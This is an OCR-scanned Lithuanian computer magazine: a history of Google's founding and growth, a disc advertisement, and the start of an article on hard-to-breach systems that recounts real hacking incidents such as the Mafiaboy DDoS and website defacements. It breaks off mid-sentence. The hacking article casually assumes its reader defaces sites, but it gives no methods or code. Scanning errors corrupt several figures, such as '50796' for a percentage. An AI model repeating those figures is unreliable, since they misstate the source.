CIŲ MATEMATIKO EDVARDO KAZNERIO 
MOKSLINIS DARBAS, KURIAME PIRMĄ 
KARTĄ BUVO PANAUDOTAS ŽODIS „G00- 

GOL“, REIŠKIANTIS SKAIČIŲ 10, PAKELTĄ 
ŠIMTUOJU LAIPSNIU, T.Y. VIENETAS SU ŠIM- 

TU NULIŲ. ŠĮ JUOKINGĄ SKAIČIAUS PAVA- 

DINIMĄ SUGALVOJO DEVYNMETIS KAZNE- 

RIO SŪNĖNAS. ŠIANDIEN KO BEPAKLAUS- 

TUM, ŽODIS „GO00GLE“ ASOCIJUOJASI VI- 
SISKAI NE SU MATEMATINIU DYDZIU, O SU 
PACIA POPULIARIAUSIA PAIESKOS SISTEMA 
VISAME INTERNETE. SIAME STRAIPSNYJE 
KAIP TIK IR PAKALBĖSIME APIE KOMPANI- 
JOS „G00GLE“ ATSIRADIMĄ. 


„Google“ sėkmės paslaptys 

[Brinas ir Peidžas] Google sukūrimo istorija primena 
Jau išgarsėjusių Apple arba Hewlett Packard istorijas: 
„Au jauni žmonės garaže pradeda įgyvendinti savo idė- 
jas...“. Bet pradėkime nuo pačios pradžios. 

Sergejus Brinas gimė Maskvoje, 1973 metais mate- 
matikų šeimoje — jo tėvas buvo mokyklos mokytojas, o 
senelis dar 50-aisiais dėstė matematiką Maskvos eko- 
nomikos institute. 1979 metais šeima iš SSRS persi- 


kėlė į JAV pagal amerikietišką emigracijos programą asmenims 
su žydų šaknimis. Ten Sergejaus tėvas Michailas Brinas pradėjo 
dėstyti Merilendo valstijos universitete, 0 motina dirbti NASA 
agentūroje moksline specialiste. Nuo pat vaikystės jis ir jo jau- 
nesnysis brolis Semas domėjosi Kompiuterių technika. Pirma 
sis Sergejaus kompiuteris buvo Commodore-64, kurį jam pa 
dovanojo tėvas. Kartą pirmokėliui Brinui pavyko smarkiai nuste 
binti mokyklos mokytojus tuo, jog jis savo namu darbus atliko 
kompiuteriu ir atspausdino spausdintuvų — 80-ujų pradžioje 
net ir JAV asmeniniai Kompiuteriai buvo retas reiškinys. 
Baigęs mokyklą, Sergejus, be jokios abejonės, įstojo į Merilen 
do universiteto matematikos fakultetą, kuri jis pabaigė pirma 
laiko, tuo pačiu pelnydamas prestižinę NSGF stipendija. Sti 
pendija jam leido tęsti mokslus Stenfordo universitete, kuria 
me jis buvo priimtas iš karto į doktorantūra JAV universitetai 
talentingiems studentams kartais leidžia peršokti magistro laipsnį 
ir nuo bakalauro eiti iš karto prie daktaro laipsnio, 0 magistro 
laipsnį jie gauna mokymosi eigoje. Taigi 1993 metais Brinas 
palieka Merilenda ir persikelia į Palo Alto miestą, esantį Kalifor- 
nijos Silicio slėnyje, kuriame ir yra Stenfordo universitetas. 1995 
metais Sergejus Brinas gavo magistro laipsnį, 0 po dvejų metų 
planuoja gauti techninių mokslų daktaro laipsnį su informacinių 
technologijų specializacija. 

Pirmaisiais mokymosi Stenforde metais Sergejus parašė ganė 
tinai įdomią programą, kuri mokėjo automatiškai parsiųsti švie 
žias merginų nuotraukas iš „Playboy“ svetainės ir įdiegti jas vie- 
toje ekrano užsklandos jo kompiuteryje. Vėliau jo bendrakursiai 
pastebėjo, kad jie pirmą kartą matė programą, kuri automatiš- 
kai surasdavo internete esančią informaciją. Ši programėlė gy- 
vavo visiškai neilgai (ji nelabai patiko Sergejaus draugei), tačiau 
informacijos paieškos tema ėmė rodytis daugelyje mokslinių 
Sergejaus darbų. 

Lorencas Peidžas gimė žymaus kompiuterių specialisto, vieno 
iš kompiuterių pionierių, Karlo Peidžo šeimoje. Kaip ir Sergejų, 
Larį nuo pat vaikystės supo kompiuteriai. Jie buvo pagrindinis jo 
pomėgis, tačiau labiausiai jį domino „geležis“. 

Baigęs mokyklą vaikinas įstojo į Mičigano valstijos universitetą, 


300876 Inc. Ikūrėjai 


kur jo tėvas dėstė skaičiavimo sistemų teorijos kursą. Yra viena 
idomi istorija apie tai, kaip Laris iš Lego konstruktoriaus detalių 
kartą surinko juodai-balto čiurkšlinio spausdintuvo ir braižytuvo 
modelius. Mokslų Metu jis dalyvavo daugelyje universiteto moks- 
linių bendruomenių, dažnai būtent jis būdavo vadovas. Puikiai 
pabaigęs universitetą, Peidžas nusprendė savo mokslus tęsti 
elitiniame Stenforde. 

1995 metų kovą Laris kartu su Mičigano universiteto absolven- 
tų grupe atvažiavo į Stenfordą. Tuo metu jam jau buvo 24 me- 
tai. Supažindinti grupę su universitetu turėjo Sergejus Brinas, 
kuris ten jau mokėsi dvejus metus. 

Ekskursijos dalyviai po to pasakojo, kad Laris ir Sergejus vienas 
kitam ne itin patiko — jie puldavo ginčytis dėl menkiausio maž- 
možio, kiekvienas bandė įrodyti savo požiūrio teisingumą. Grei- 
čiausiai būtent dėl to vėliau jie ir susiėjo, 0 netrukus tapo arti- 
mais draugais. 


[Universiteto „Google“] Gavęs magistro laipsnį, Sergejus spėjo 
sudalyvauti daugelio mokslinių projektu įgyvendinimuose: jis kūrė 
autorinių teisių pažeidimų sekimo sistemą, dalyvavo kuriant TeX 
formato dokumentų konvertavimo į HTML įrankį (jis buvo nau- 
dojamas moksliniams dokumentams publikuoti internete), su- 
kūrė svetainę, kurioje buvo realizuojamas reitinguotas naujų ki- 
no filmų įvertinimas. Tačiau Sergejų vis labiau domino duome- 
nų surinkimas, taigi jis įstojo į MIDAS (Mining Data at Stanford) 
darbo grupę. 

Ta pačia kryptimi savo tyrinėjimus atlikinėjo ir Laris Peidžas. Anks- 
čiau Sergejus ir Laris nepritarė vienas kito idėjoms, tačiau vienu 
klausimu jų nuomonės sutapo: egzistuojančios paieškos siste- 
mos labai neefektyvios, todėl reikia sukurti naują požiūrį į infor- 
macijos paiešką internete. 

1995 metų pabaigoje jie pradeda kartu dirbti prie nuosavo pro- 
jekto, 0 jiems vadovauja informatikos ir skaičiavimo technikos 
katedros docentas Radživas Motvanis. Jų projektas bendrais 
bruožais buvo paruoštas dar 1996 metų pradžioje, tai buvo 
visiškai naujas informacijos paieškos algoritmas, technologija, 
kuri buvo pavadinta Page Rank. Pagrindinę technologijos idėją 
paprasta suprasti ir jos esmė štai tokia. Vaikinų 1996 metų 
pavasarį sukurtas paieškos serveris BackRub analizavo taip va- 
dinamas atgalines nuorodas (back links), t.y. nuorodų kiekį in- 
ternete, kurios veda į tam tikrą svetainę. Toliau remiantis gau- 
tais duomenimis buvo sudaroma svetainių hierarchija. Taip re- 


Erikas Šmitas, Google direktorius 

alizuojama pagrindinė idėja, kurią Peidžas ir Brinas pasiūlė, sie- 
kiant efektyviai ieškoti informacijos: kuo dažniau svetainė ci- 
tuojama internete, tuo aktualesnė ir reikalingesnė vartotojui skirta 
informacija yra joje. Atsakydama į tam tikrą užklausą, paieškos 
sistema pateikia nuorodas, kurios prieš tai surūšiuojamos pa- 
gal reikšmingumą. Šis rūšiavimas buvo atliekamas ne tik anali- 
zuojant nuorodų į tam tikrą svetainę kiekį, bet ir jų kokybę 
nuoroda iš svetainės, kuri hierarchijoje užima aukštą vietą, turi 
aukštesnį lyginamąjį svorį, nei nuoroda iš ne tokios reikšmin- 
os, kas daroma proporcingai jų padėčiai pagal bendrą ranga. 
Š idėja buvo aprašyta keliuose moksliniuose straipsniuose, ku- 
riuos Brinas išpublikavo amerikietiškuose akademiniuose žur- 
naluose. 

1996 metų rudenį universiteto bendrabučio kambaryje Laris 
surinko galingą serverį, skirtą interneto svetainių indeksavimui. 
Nors universitetas dalinai finansavo vaikinų darbą, jiems teko 
įlįsti į skolas, kurios siekė 15 tūkstančių dolerių teko nupirkti 
kietujų diskų, kurių bendra apimtis siekė 1 (!) terabaitą. Savo 
ruožtu Sergejus pavertė savo kambarį biuru Ir užsiėmė projekto 
plėtojimu. Vaikinai visiems Stenfordo studentams suteikė gali- 
mybę naudotis BackRub ir ieškoti informacijos mokslo įstaigos 
viduje, o patys pratęsė savo kūrinio vystymą. 


Sergejus, Lans ir Erikas 
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Laris Peidžas 

Užpatentavę savo paieškos technologiją, Brinas ir Peidžas nu- 
sprendė ją parduoti kokiai nors stambiai interneto kompanijai, 
tačiau iš šios minties nieko gero nesigavo. Tuo metu kompani- 
jos paieškos serverių perspektyvą matė netoliaregiškai, laikyda- 
mos juos kažkuo antraeiliu. Tuo metu stambios kompanijos „Ex- 
cite“ vadovas Džordžas Bellas vaikinams paaiškino, kad iš pa- 
ieškos pinigų neuždirbsi ir kad geriau atidaryti nemokamą pašto 
svetainę bei daryti pinigus iš reklaminių antraščių rodymo (po 
keleto metu „Excite“ bankrutavo). Nepaisant internetinio verslo 
profesionalų paskelbto nuosprendžio apie nekokias paieškos 
sistemos projekto perspektyvas, Sergejus ir Laris toliau jį palai- 
kė, nepraleisdami progų jį parduoti. 

Maždaug tuo metu jų paieškos sistema gavo vardą Google. 
Vaikinai šiek tiek pakeitė žodį g00gol, taip ji padarydami gražiau 
skambančiu. Šis pavadinimas kaip niekas kitas gerai atspindi 
sistemos paskirtį struktūrizuoti milžinišką informacijos kiekį, 
kuris savo apimtimis artėja prie skaičiaus g0o0gol. Visus 1997 
metus paieškos sistemą naudojo Stenfordo studentai, kurie bu- 
vo tiesiog sužavėti jos galimybiu. O 1998 metais Google beta 
versija buvo paleista Stenfordo universiteto serveryje. Tuomet 
ją buvo galima rasti adresu Attp://google.stanford.edu. Tais pa- 
čiais metais Sergejus Brinas ir Laris Peidžas gauna galimybę 
dėstyti universitete. Antradieniais ir ketvirtadieniais jie veda pa- 
skaitas tema „Duomenų analizė bei paieška ir pasaulinis vora- 
tinklis“. 

1998 metu vasarą Sergejus susitiko su Deividu Filo, Yahoo! 
įkūrėju (beje, jis irgi buvo Stenfordo studentas). Jis atsisakė 
Sergejaus pasiūlymo pirkti Google ir pasiūlė jam užsiimti ne 
šios technologijos pirkėjo paieška, o įkurti nuosavą kompaniją, 
kuri specializuotųsi informacijos paieškoje internete. 

Tais pačiais metais prasidėjo Peidžo ir Brino problemos su uni- 
versiteto vadovybe. Jiems buvo priskiriamas kompiuterinis chu- 
liganizmas Google robotas nekreipė dėmesio į robots.txt by- 
las, taip siųsdamas vidinę universiteto informaciją. Be to, Go- 
ogle suėsdavo 50796 viso universiteto tinklo srauto — paieškos 
sistema jau naudojosi apie 10 tūkstančių žmonių per dieną. 
Sergejui ir Lariui leido suprasti, Kad tolimesnis jų paieškos sis- 
temos buvimas universiteto serveryje nepageidaujamas. 


[„Google Inc.“ garažas] 1998 metu rugsėjo pradžioje Serge- 
jus Brinas susitiko su Endžiu Bechtolšeimu, kompanijos „Sun 
Microsystems“ ir „Granite Systems“ įkūrėju. Sergejus bendrais 


Sergejus Brinas 


bruožais papasakojo apie naujos technologijos galimybes, pa- 
rodė Google veikimą ir jau norėjo išsamiai paaiškinti paieškos 
sistemos darbo principą, bet Endis net nesigilino į detales. Jis 
tiesiog paklausė: „Kieno vardu išrašyti čekį?“. 

100 tūkstančių dolerių čekis buvo išrašytas dar neegzistuojan- 
čios kompanijos „Google Inc.“ vardu. Vaikinai nusprendė palikti 
Stenfordą (Brinui iki daktaro disertacijos gynimo liko vos pusė 
metų), su savimi prigriebdami ir Kreigą Silveršteiną. Per keletą 
dienų jie paruošė visus kompanijos įregistravimui reikalingus 
dokumentus, surinko dar šiek tiek pinigų ir surado biurą savo 
firmai. Rugsėjo 7 dieną kompanija „Google Inc.“ buvo oficialiai 
įregistruota ir jau kitą dieną pradėjo savo darbą, kuomet visi 
trys jos darbuotojai atvyko į garažą, esantį Kalifornijos valstijos 
Menlou Parke. 

Dabar paieškos svetainė įgijo domeno vardą g00gle.com . Spau- 
doje vis dažniau ėmė mirgėti frazės: „Protinga paieškos siste- 
ma“, o tokie stambūs leidiniai, kaip „USA Today“ ir „Le Monde“ 
ypatingai išskyrė Google už informacijos paieškos patogumą. 
1998 metų gruodį autoritetingiausias žurnalas „PC Magazine“ 
sudarė šimto geriausių interneto svetainių sarašą. Siame sąra- 
še atsidūrė ir google.com . Nuo to ir prasidėjo spartus „Google 
Inc.“ augimas. 

Kitų metų vasarį kompanijoje jau dirbo aštuoni darbuotojai, o 
serverio per dieną apdorojamų užklausų kiekis viršijo 500 tūks- 
tančių. Meniou Parko garažas normaliam darbui tapo pernelyg 
mažas, todėl kompanijos biuras persikėlė į Palo Alto miesto 
University avenue. Birželį dvi stambiausios Silicio slėnio rizikin- 
go verslo įmonės „Seguoia Capital“ ir „Kleiner Perkins Caufield 
8: Byers“ į „Google Inc.“ investavo 25 milijonus dolerių. Šių kom- 
panijų atstovai Maikas Morisas ir Džonas Deras, kuris anksčiau 
dirbo „Sun Microsystems“, „Amazon“ ir „Yahoo!“, tampa „Go- 
ogle“ direktorių tarybos nariais. 

1999 metų pabaigoje biuro patalpų dydžio vėl pradeda stigti, 
todėl buvo nuspręsta pasistatyti nuosavą pastatą. 


[Googleplex] Po persikėlimo į taip vadinamą Googleplex — nau- 
ją biurą, esantį Mountain View — kompanija sudaro savo pir- 
mąją iš tiesų stambią sutarti su „America On-Line“. Tapęs ofi- 
cialiu AOL portalo paieškos serveriu, Google gauna iki 3 milijo- 
nų užklausų per dieną. Antroje rugsėjo pusėje paieškos siste- 
ma nustoja būti beta versija. 

Tais pačiais metais Google išeina už JAV ribų ir pradėjo teikti 


savo paslaugas britų portalo Virgin Net ir 
itališkojo Virgilio lankytojams. Google ir 
toliau veržiiai užkariavo pasaulį. Tokie 
stambiausi Azijos portalai, kaip japonų 
BIGLOBE, kiniečių NetEase ir pietų korė- 
jos Lycos Korea pradeda naudotis Goog- 
le paslaugomis. Stambiausias Lotynų 
Amerikos portalas Universo Online taip 
pat tampa jų klientu. Buvo pasirašyta su- 
tartis ir su Yahoo! pačia populiariau- 
sia Interneto svetaine. Kompanija tam- 
pa žurnalo Wired konkurso nugalėtoja, 
kur gavo „Wired skaitytojų balsą“. „Go- 
ogle Inc.“ atidaro savo padalinius Tokiju- 
je ir Hamburge, Kad būtų galima pritraukti 
šių regionų reklamos užsakovus. Metų 
pabaigoje paieškos sistema apdoroja 20 
milijonų užklausų per dieną, o 2001 me- 
tais šis skaičius išauga iki 100 milijonų. 
Galų gale kompanija pradėjo dirbti pel- 
ningal. 

Dabar Googleplex pastate sukurtos visos 
reikiamos sąlygos vaisingam darbui. Dar- 
buotojai gali bet kuriuo metu pasinaudoti 
nemokamos kavos, arbatos ir gaiviųjų gė- 
rimų automatais. | biurą galima ateiti su 
vaikais Ir naminiais gyvūnėliais, o valgyk- 
loje dirba vienas geriausių Kalifornijos vi- 
rėjų. Biuro koridoriuose virš kai kurių durų 
kabo dideli raudonos, geltonos, mėlynos 
ir žalios spalvų, kurios naudojamos kom- 
panijos logotipe, balionai. Tomis pačio- 
mis spalvomis su pieštukais nupiešti ir ant 
sienų iškabinti piešiniai. Juose pavaizduo- 
tas kompanijos gyvenimo kelias, jos pa- 
grindiniai pasiekimai. Prie įėjimo į Goog- 


Kompanijos darbuotoja 


Ieplex stovi monitorius, realaus laiko reži- 
mu atvaizduojantis užklausas, kurias šiuo 
metu apdoroja paieškos sistema. Ant kai 
kurių sienų galima pamatyti dartų žaidi- 
mo (smiginio) taikinius. Dvidešimt procen- 
tų savo darbo laiko darbuotojai gali pa- 
naudoti savo potencialo vystymui: nuosa- 
vų projektų kūrimui, tyrimams, straipsnių 
rašymui arba tiesiog savišvietai. 

Apie „Google Inc.“ kalbama, jog būti Kkom- 
panijos dalimi tai ne darbas, 0 privi- 
legija. Be aukšto darbo atlygio darbuo- 
tojai taip pat gaudavo kompanijos akci- 
jų, todėl daugelis iš kompanijos darbuo- 
tojų po akcijų paleidimo į rinką tapo mi- 
lijonieriais. Personalui keliami reikalavi- 
mai labai dideli tarp pirmų 150 pa- 
samdytų žmonių buvo dvidešimt techni- 
nių mokslų daktarų. Patys kompanijos 
įkūrėjai Brinas ir Peidžas užima kompa- 
nijos prezidentų pareigas. Sergejus — 
technologijos prezidentas, Lorensas 
produkcijos prezidentas. Direktorių tary- 
bos pirmininko ir pagrindinio generalinio 
direktoriaus pareigoms jie nusamdė la- 
biau versle patyrusį žmogų — Eriką Šmi- 
tą, kuris prieš „Google“ dirbo „Novell“. 
Sergejus didžiąją darbo laiko dalį užsii- 
ma organizaciniais klausimais, priima su 
tolimesne kompanijos politika susijusius 
sprendimus. Jis taip pat aktyviai dalyva- 
vo „Google“ rusifikacijos projekte — ne- 
paisant to, kad iš SSRS išvažiavo būda- 
mas vos penkerių, jis puikiai kalba rusiš- 
kai ir dažnai savo tėvynainiams žurnalis- 
tams interviu duoda būtent šia kalba. 
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2003 metais „Google“ tapo pačia populiariausia paieškos 
sistema pasaulyje: 200 milijonų užklausų per dieną 88 kal- 
bomis! Kai kuriose šalyse tai sudarė daugiau nei 8096 nuo 
visų interneto paieškos paslaugų apimties. Naujuose encik- 
lopediniuose žodynuose galima sutikti veiksmažodį „to go0g- 
Ie“, reiškiantį informacijos ieškojimą internete. 


[Kapitalizacija] 2003 metų pradžioje žymi britų kompanija 
„Interbrand“ paskelbė „Google“ metų brandu (firminiu žen- 
klu). Paieškos sistemai čia pavyko aplenkti Apple ir „Coca 

Cola“ vardus. Gaudama milžinišką pelną, „Google“ 2004 me- 
tais vis dar liko privačia kompanija, kurios akcijos priklausė 
siauram kompanijų-investuotojų, jos įkūrėjų ir darbuotojų ra- 
tui. Siekiant tolimesnio plėtojimosi, reikėjo „Google Inc.“ pa- 
leisti į biržą. Tai įvyko rugpjūčio mėnesį, kuomet kompanijos 
akcijos pasirodė NASDAO biržoje, kur sukėlė didelį ažiotažą, 
o Sergejų su Lariu padarė milijardieriais. Kiek vėliau Žurna- 
las „Forbes“ Google autorius pavadino pačiais jauniausiais 
planetos milijardieriais. 

Siekiant išvengti didelius akcijų paketus turinčių korporacijų įta- 
kos, aukcione buvo išparduotos tik tos akcijos, kurios kompani- 
joje jų savininkui nesuteikė balso teisės. Teisę valdyti kompani- 
ją įkūrėjai pasiliko sau. 

2004 metais Sergejui Brinui ir Lorensui Peidžui buvo įteikta 
prestižinė Markonio premija. Iki tol ja apdovanoti buvo WWW 
sukūręs Timas Bernersas-Ly ir Ethernet technologijos išradėjas 
Robertas Metkalfas. Kaip matai, Sergejaus ir Lario indėlis in- 
formacinių technologijų srityje buvo aukštai įvertintas, netgi pri- 
pažintas revoliuciniu. 

„The Times of India“ svetainė 2001 metais išanalizavo Go- 
ogle privalumus prieš kitomis 
paieškos sistemomis. Paaiš- 
kėjo, jog stipriosios Google 
pusės tai minimalus žŽmMo- 
gaus įsikišimas į paieškos 
mechanizmą ir nuolatinis nau- 
dojamos technologijos tobu- 
linimas. Svarbia kompanijos 
sėkmės dalimi taip pat tapo 
teisingas pozicionavimas su- 
sidariusioje interneto paslau- 
gų rinkoje viso kompanijos eg- 
zistavimo metu. „Google Inc.“ 
nuo pat pradžių stambius por- 
talus vertino ne kaip savo kon- 
kurentus, 0 Matė juose poten- 
cialius klientus. Nuosavos pa- 
ieškos sistemos licencijavi- 
mas kitoms firmoms pavirto į 
stambių pajamų šaltinį. O vė- 
liau kompanija pradėjo auginti 
papildomai siūlomų paslaugų 
kiekį. 

Nors technologijos licencijavi- 
mas kitoms firmoms ir atne- 
šė apčiuopiamą pelną, pagrin- 
diniu pajamų šaltiniu vis dėl- 
to lieka reklama. Čia Google 
ir vėl pasirodė inovatoriškai. 


„Google“ darbuotojos darbo vieta : 


Visų pirma, čia visiškai nėra reklaminių antraščių, atsibodu- 
sių Iššokančių langų ir panašių dalykų, 0 vietoje viso šito 
paprasčiausios nuorodos į reklamos užsakovų svetaines. An- 
tra, tik tematinė reklama, atitinkanti vartotojo įvestą užklau- 
są. Trečia, reklaminės nuorodos išskiriamos iš kitų, kas ga- 
nėtinai sąžininga vartotojų atžvilgiu. Tokio reklaminio mode- 
lio privalumus įvertino tiek vartotojai, tiek ir reklamos užsa- 
kovai. Su „Google“ sutartis sudarė šimtai tūkstančių rekla- 
mos užsakovų. 


[„Google“ versus „Microsoft“] Šiandien Google.com užima ket- 
virtą vietą labiausiai lankomų interneto svetainių sąraše, nusi- 
leisdama tik Yahoo!, MSN ir AOL. Tarp šių kompanijų prasidėjo 
tikras karas už tinklo vartotojus. Vargu ar Yahoo! arba AOL paieš- 
kos sistemos sugebės konkuruoti su Google, o Google portalas 
gali pasirodyti besąs ganėtinai konkurencingas. Beje, laikas pa- 
rodys. Dabar reali grėsmė Google kyla iš „Microsoft“, plėtojan 
čios savo MSN sistemą, kurią, be jokios abejonės, aktyviai nau- 
dos naujos „Microsoft“ operacinių sistemų versijos. Styvas Bal- 
meris nesenai vykusiame susitikime su Stenfordo studentais pa- 
sidalino mintimis apie Google ateiti, šiam nuspėjęs penkis me- 
tus gwenimo, o Bilas Geitsas Karlisbade vykusioje D3 konferen- 
cijoje Google pavadino „burbulu, kuris dar kol kas plaukia“. 
Masinio informavimo priemonėse dažnai cituojama Serge- 
jaus Brino frazė: „Kai kurie sako, kad Google tai Dievas. 
Kiti — jog tai pats Šėtonas. Tačiau jeigu jie mano, kad Goog 
Ie per daug įtakinga, tegu prisimena, jog nueiti į kitą paleš- 
kos sistemą tereikia vienintelio pelės klavišo paspaudimo. 
Žmonės į Google ateina todėl, kad jie jį renkasi. Mes jų ne- 
verčiam“. 
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Intenso, optinių laikmenų pardavimų lyderis Vokietijoje, siūlo platų 
aukštos kokybės CD-R, CD-RW, DVD-R(W), DVD+R(W) ir padidintos 
talpos diskų 800Mb/90 min. pasirinkimą. Visi šie produktai 
platinami „cakebox“ ir „jewel“ dėžutėse. 


muzika | duomenys | nuotraukos | video 


Spartiems DVD, mini-DVD (8 cm) ir dvisluoksniams DVD diskams 
Intenso siūlo dar platesnį pakuočių pasirinkimą. 

Unikalus naujas produktas - CD ir DVD su specialiu spalvas 
apsaugančiu užpurškimu. 


Intenso - tai aukštos kokybės produkcija už gerą kainą. 
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SAUGUMO SVETAINĖSE DAŽNAI RAŠOMA 
APIE OPERACINES SISTEMAS, KURIOS AD- 
MINUI GARANTUOJA ŠIMTAPROCENTINĮ 
SAUGUMĄ, APIE NEPRAEINAMAS UGNIA- 
SIENES, KRIPTOALGORITMUS, SU KURIAIS 
ARTIMIAUSIUS DEŠIMTĮ METŲ APIE HAKE- 
RIUS GALIMA PAMIRŠTI. TAČIAU PAKANKA 
UŽEITI Į BUGTRAO, PAŽIŪRĖTI Į APLINK BE- 
SIPUIKUOJANČIŲ SKYLIŲ KIEKĮ, IR VIETOJE 
PATIKIMŲ UŽRAKTŲ TU PRIEŠ SAVE PAMA- 
TAI TRAPIUS LAUKO TUALETO KABLIUKUS, 
KURIUOS IŠLAUŽTI — VIENI NIEKAI. NEPAI- 
SANT TO, TARP DAUGYBĖS KOMPIUTERIŲ 
SISTEMŲ, PROGRAMŲ IR ĮRENGINIŲ YRA 
TOKIŲ, KURIOS ATSISPIRIA NET IR KIEČIAU- 
SIEMS HAKERIAMS. AŠ TAU PAPASAKOSIU 
APIE PAČIAS KIEČIAUSIAS PASAULIO AP- 
SAUGAS. 


Labiausiai apsaugotos kompiuterių sistemos 
[Operacinės sistemos] Kompiuteryje įdiegta operacinė sis- 
tema — esminis AK saugumo faktorius. 2004 metais anglų 
saugumo kompanija „mi2g“ atliko tyrimą, kurio tikslas buvo 
išaiškinti pačias saugiausias OS. Pažeidžiamiausios pasiro- 
dė besančios mūsų visų didžiai mylimos langinės ir serverių 
rinkoje smarkiai išpopuliarėjęs Linux, kuris jau senai nepre- 
tenduoja į saugios operacinės sistemos titulą. Pačiomis tvir- 
čiausiomis buvo pripažintos Mac OS ir *BSD šeima. Tiesa, 
jeigu dėl BSD niekam nekyla jokių abejonių, tai Apple pro- 
duktas į šį sąrašą aiškiai papuolė per nesusipratimą. Visų 
pirma, ši sistema menkai paplitusi, ką jau kalbėti apie jos 
įdiegimą serveriuose. Antra, Macintosh visada buvo orien- 
tuotas į pradedančiuosius vartotojus ir dizainerius, 0 ne į sis- 
temų administratorius. Praėjusių metų rugpjūčio pabaigoje 
Apple išleido pataisymų paketą, kuris užtaiso 40 (keturias- 
dešimt!) savo OS pažeidžiamumų. Prieš tai žymi kompanija 
„Symantec“ savo Security Threat Report ataskaitoje aprašė 
apie 37 Mac OS apsaugos skyles. Žinoma, šiandien praktiš- 
kai visos jos nebeaktualios, joms jau sukurti pataisymai ir 
atnaujinimai, tačiau kas garantuos, kad rytoj nebus surastas 
dar vienas kritinis pažeidžiamumas? Taigi jeigu tu naudoji 
Mac'ą ir manai, kad gyveni lygiagrečiame hakerių pasaulyje, 
tai smarkiai klysti. 

Atskirai norėtųsi išskirti OpenBSD. Šios OS kūrėjai nuo pat 
pradžių kėlė sau užduotį sukurti maksimaliai saugią sistemą, 
ir vaikinams tai pavyko. Be abejo, OpenBSD taip pat turi klai- 
dų, tačiau, visų pirma, jų labai jau mažai, o antra, šioms 
skylėms skirti pataisymai išleidžiami tuojau pat. Vis dėlto sau- 
giausia sistema visoje planetoje yra ne Theo de Raadt'o ir jo 
kompanijos tvarinys. Pagal „Patikimų kompiuterių sistemų įver- 
tinimo kriterijų“ dokumentą, kurį sukūrė JAV nacionalinio sau- 
gumo agentūra, aukščiausiai saugumo klasei priskiriama XTS 
300 STOP Tu apie tokią OS tikriausiai nė negirdėjai. Tai kom- 
panijos „Wang Federal“ produktas, kuris be operacinės sis- 
temos apima ir aparatinę dalį, sukurtą Intel procesorių pa- 
grindu. XTS-300 veikia su UNIX tipo OS, vienu metu su ja 
dirba iki 200 procesorių ir dažniausiai yra naudojama karinė- 
se struktūrose. Čia labai tiktų žymaus rusų saugumo eksper- 
to 3APA3A citata: „Kuo OS nenaudingesnė, tuo ji saugesnė". 
Su visa pagarba XTS-300, ONX ir kitoms egzotiškoms siste- 
moms, jų funkcionalumo dažnai tiesiog neužtenka, todėl žmo- 
nės diegia kad ir mažiau apsaugotas, bet kur kas pažanges- 
nes ir populiaresnes sistemas. 

Pratęsdamas *nix temą, pasakysiu porą žodžių apie virusus. 
Neįtikėtina, bet daugelis *nix vartotojų iki šiol šventai tiki, 
kad Linux ir BSD sistemose nebūna virusų. O juk pirmasis 
plačiai žinomas virusas — Moriso kirminas — veikė būtent 4 
BSD UNIX sistemoje. 2001 metais tinklo virusas Sadmind 
SUN Solaris vartotojams prikrėtė nemažai eibių, 0 2002 kir- 
minas Slapper, kuris eksploatavo OpenSSL buferio perpildy- 
mo klaidą, infekavo apie 20000 mašinų su įdiegta Linux sis- 
tema. Šį sąrašą galima būtų tęsti. Mielas uniksoide, nežaisk 
su ugnimi — Kasperskio ir Dr.Web antivirusai sukurti ir tavo 
mėgiamai sistemai! 

Atspariausia virusams sistema — tai, be jokios abejonės, Mac 
OS, tačiau makrovirusai veikia ir čia. O jie ir negali neegzistuoti — 
juk tai skriptai, kurie sukurti tam tikram programiniam produktui, 
todėl jų veikimas nepriklauso nuo OS tipo. 


Viena labiausiai apsaugotų planetos vietų Pentagonas 


[Svetainės] Visai įmanoma, jog tu, nepaisydamas visų mū- 
sų įspėjimų, laužei web portalus. Gali būti, jog tu pakeisda- 
vai pagrindinį tokios svetainės puslapį ir palikdavai joje por- 
nografinį vaizdelį, trynei duomenų bazes, naudojaisi konfi- 
dencialia informacija. Tiesa, vargu, ar tavo kolekcijoje buvo 
bent viena vyriausybės ar stambios korporacijos svetainė, ar- 
ba bent jau kokia nors paieškos sistema. Pastarąsias tu lai- 
kei nepažeidžiamais portalais, kuriuos prižiūri kieti sistemų 
administratoriai. Kiek kitaip galvojo penkiolikmetis hakeris iš 
Kanados, kuris save vadino Mafiaboy. Užgrobęs keletą uni- 
versitetinių serverių, jaunasis įsilaužėlis iš jų sukūrė DDOS 
atakų vykdymo placdarmą. DDOS'inti jis nusprendė ne šiaip 
sau kažką, o CNN, Yahoo! ir Amazon, kas po poros valandų 
jam sėkmingai pavyko ir šie stambiausi portalai buvo nepa- 
siekiami. Atakos sukelti nuostoliai siekė apie milijardą dole- 
rių, Į šią sumą įeina ir keleto nuo interneto priklausomų kom- 
panijų akcijų kritimas. Mafiaboy įkliuvo dėl per didelių pagyrų 
IRC pokalbiuose. Vaikinukas atsiprašė, prižadėjo, jog dau- 
giau taip nedarys, tačiau nuo to laiko prie kompiuterio jis 
prieina tik stebimas mokytojo. Interneto visuomenė buvo su- 
krėsta, jog tokį stambų resursą kaip Yahoo gali blokuoti net 
15 metų paauglys. 

Kiekvienas hakeris svajoja defeisinti Microsoft.com. Pasirodo, 
nulaužti galima ir šį be jokios abejonės vieną iš labiausiai ap- 
saugotų interneto resursų. Vaikinai iš OutLaw Group 2004 me- 
tais viename iš portalo puslapių (visiškai nulaužti serverio jiems 
nepavyko) paliko savo defeisą. Jeigu įdomu, juo pasigrožėti gali 
čia: web-hack.ru/defaced/microsoft.com.jpg. Neatsilieka ir Bra- 
zilijos įsilaužėliai komanda Insanity Zine Corp pakeitė pa- 
grindinį Microsoft.com puslapi brazilų kalba — www.micro- 
soft.com/brasil/. 

Beje, laužiami ne tik mažaminkščiai. Kompanijos „Asus“ porta- 
lą kadaise nulaužė toks 14m3, kuris pagrindiniame puslapyje 
paliko štai tokią žinutę: defaced by 14m3 k1dd13 fuck hac- 
kphreak and that stupid dickhead rloxley. Kaip aš supratau, vai- 
kinas tuo norėjo pasakyti, kad jis — labai kietas, o hakeriai 
hackphreak ir rloxley — niekam tikę lameriai. Tiesa, nelabai 
aišku, kuo čia dėtas žymus komplektuojančių dalių gamintojas, 
bet bala jo nematė. 
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Straipsnis apie visame pasaulyje žinomą hakeri Analyzer 


JAV armijos web svetainė www.army.mil teisėtai yra pirmoje įvairių 
topų iš serijos „portalai, Kurių neimanoma nulaužti“ vietoje. Taip 
buvo, kol dvidešimtmetis Čadas Devis pagrindiniame puslapyje 
